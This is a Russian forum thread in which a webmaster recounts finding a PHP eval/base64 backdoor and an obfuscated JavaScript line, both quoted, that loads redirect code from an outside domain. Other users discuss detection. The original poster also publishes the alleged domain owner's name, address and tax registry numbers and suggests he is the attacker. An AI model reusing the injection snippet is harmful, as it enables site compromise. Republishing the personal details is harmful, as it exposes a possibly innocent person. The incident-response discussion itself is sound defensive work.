Форум Сайтостроение Безопасность

Мой вчерашний опыт борьбы с мобильным редиректом.

12
filmakarov
На сайте с 23.10.2011
Offline
45
filmakarov
3803

Может быть, кому-то будет полезным.

Итак, совершенно случайно, зайдя с мобильника (3g, мегафон) проверить работоспособность сайта обнаружил редирект на мобильные подписки.

Айболит ( www.revisium.com/ai/ ) ничего не нашел.

Был выполнен поиск по "base64_decode" и обнаружено следующее: 

framework/son.class.php:eval(base64_decode($payload));

Название переменной показалось странным. Зашел в файл - так и есть, бэкдор.

Содержимое: 

<?php

$payload='JGF1dGhfcGFzcy  ....закодированное содержимое поскипано....    iKTs=';

eval(base64_decode($payload));

?>

Последнюю строчку поправил таким образом: 

echo ( eval(base64_decode($payload)) );

И выполнил скрипт. Получил миленький файловый менеджер по своему сайту.

Еще нашел такой же бэкдор с названием файла: 

/ckfinder/core/ckfinder.php

Причину нашел. Дальше надо было искать сам редирект.

Тут пришлось повозиться чуть долше. По дате изменения ничего найти не удалось, так как злоумышленник ее подделал.

Пришлось руками перебирать все заюзанные в темлейте .js файлы на предмет необычного кода.

В итоге нашлось вот что: 

var jquery_start = true;

document.write('<script type="text/javascript" src="//' + String.fromCharCode.apply(null, [99,111,117,110,116,101,114,46,121,97,100,114,111,46,105,109]) + '/урлмоегосайта"></script>');

var jquery_end = true;

Сие счастье подгружало код с адреса 

counter.yadro.im/урлмоегосайта

И уже этот код редиректил мобильных юзеров на всякую гадость. Косят под счетчик я.метрики, гады.

Так что вот, если у кого возникнет похожая проблема, найти сам редирект может помочь поиск по fromCharCode.

Ну и в заключение. Страна должна знать своих героев. Whois инфа по yadro.im 

Domain Name:        yadro.im

Domain Managers

Name: EPAG Domainservices GmbH

Address

Niebuhrstr. 16b

Bonn

53113

Germany

Domain Owners / Registrant

Name: Egor Gaityna

Address

ul.Selskai, 34

korenovsk

Krasnodarskiy kray

353180

Russian Federation

Administrative Contact

Name:  Egor Gaityna

Address

ul.Selskai, 34

korenovsk

Krasnodarskiy kray

353180

Russian Federation

Хорошая фамилия, гуглится легко.

Итак:

Вид предприимателя: Индивидуальный предприниматель

ФИО: Гайтына Егор Викторович

Реквизиты (данные из ЕГРИП):
ОГРНИП: 310233536100012

Дата внесения в реестр: 27.12.2010

ИНН: 233507433072

ОКПО: 0176250514

ОКАТО: 03221501 - Краснодарский край, Районы Краснодарского края, Кореновский, Города районного подчинения Кореновского р-на, Кореновск

ОКТМО: 03621101 - Кореновский муниципальный район, Кореновское городское поселение Кореновского района

Адрес, меcтоположение (по ОКАТО 03221501000): Город Кореновск

Основной вид экономической деятельности: 52.24.2 - Розничная торговля кондитерскими изделиями

Хакер-сладкоежка, фигли :bl:

И вообще, богатая биография у человека:

workandjob.ru/38005840/2013/01/24/38005840.html

http://cy-pr.cn/206867-s.html

Другие сайты на этом же серваке:

adalt1.pp.ua
games.multpult.net
goroskop.pp.ua
jwomans.ru
megafaq.info
multpult.net
muzmp3.pp.ua
ossinfo.ru
ruskredits.ru
sminecraft.ru
yadro.im
znak-scorpio.com
dimsog
На сайте с 08.08.2011
Offline
149
dimsog
#1

А дыру в безопасности закрыли то?:)

ihor vps -> ihc.ru
filmakarov
На сайте с 23.10.2011
Offline
45
filmakarov
#2
dimsog:
А дыру в безопасности закрыли то?:)

На 100% не удалось установить, через какую уязвимость внедрили бэкдор, но предполагаемые дыры закрыли, да.

kxk
На сайте с 30.01.2005
Offline
970
kxk
#3

filmakarov, Для регистрации .IM документов неспрашивают, а вот за публикацию персональных данных без согласия персоны или обвинение персоны в чём-либо без доказательств, можно ещё и получить от адвокатов персоны очень милый такой штраф.

Ваш DEVOPS
L
На сайте с 07.12.2007
Offline
351
Ladycharm
#4
kxk:
за публикацию персональных данных без согласия персоны или обвинение персоны в чём-либо без доказательств, можно ещё и получить от адвокатов персоны очень милый такой штраф.

Там все данные - публичные: ОГРНИП, whois. А как только его "адвокаты" объявятся - будет ясно на кого взломы сайта вешать. Там ещё бабка надвое сказала, кому штраф светит, а кому crime record

filmakarov
На сайте с 23.10.2011
Offline
45
filmakarov
#5
kxk:
filmakarov, Для регистрации .IM документов неспрашивают, а вот за публикацию персональных данных без согласия персоны или обвинение персоны в чём-либо без доказательств, можно ещё и получить от адвокатов персоны очень милый такой штраф.

я знал, что кто-нибудь мне обязательно скажет о публикации персональных данных, которые и так публичные :)

А вот насчет обвинений без доказательств - есть что-то в ваших словах. Доказать нашему суду причастность Егора ко взлому будет сложновато. Всегда можно сказать, что его сервер сломали и домен yadro.im юзали в незаконных целях точно также. Но я никого и не обвиняю, просто публикую информацию из гугла о владельце домена, который был использован в незаконных целях.

Абузы я хостеру и регистраторам все же накатал :)

Добавьте налоговую информацию Hetzner начал выгонять хостеров Прошу подсказать наилучший вариант
Devvver
На сайте с 02.07.2008
Offline
663
Devvver
#6

filmakarov, с чего вы взяли, что это хакер? Возможно это такой же пострадавший человек, как и вы.

Мой блог. Все о создании сайтов,Seo и СДЛ ( https://devvver.ru/ ) Мой SEO телеграм канал https://t.me/seobloggers
filmakarov
На сайте с 23.10.2011
Offline
45
filmakarov
#7
Devvver:
filmakarov, с чего вы взяли, что это хакер? Возможно это такой же пострадавший человек, как и вы.

Да, возможно и так.

filmakarov:
можно сказать, что его сервер сломали и домен yadro.im юзали в незаконных целях точно также.

Просто уж больно домен "красивый" и удобный в этих целях.

Да и подразделы для каждого из атакованных сайтов вполне заметно и открыто созданы. Слишком заметно для владельца.

Единственное что, возможно домен регнули на левые данные, это да. Не знаю, просят ли в зоне .im документы.

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#8

как то плохо вы отчет ай-болита смотрели

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
filmakarov
На сайте с 23.10.2011
Offline
45
filmakarov
#9
kgtu5:
как то плохо вы отчет ай-болита смотрели

Не в том месте написал про айболита )

Шелл нашли до того, как айболит успел отработать.

А вот уже сам редирект он не нашел.

У вас тоже шелл залили и мобильный редирект внедрили?

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#10
А вот уже сам редирект он не нашел.

он и не должен !!

редирект - это следствие действий вредоносного скрипта, левая вставка - причина.

айболит ищет причины, а не следствия...

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий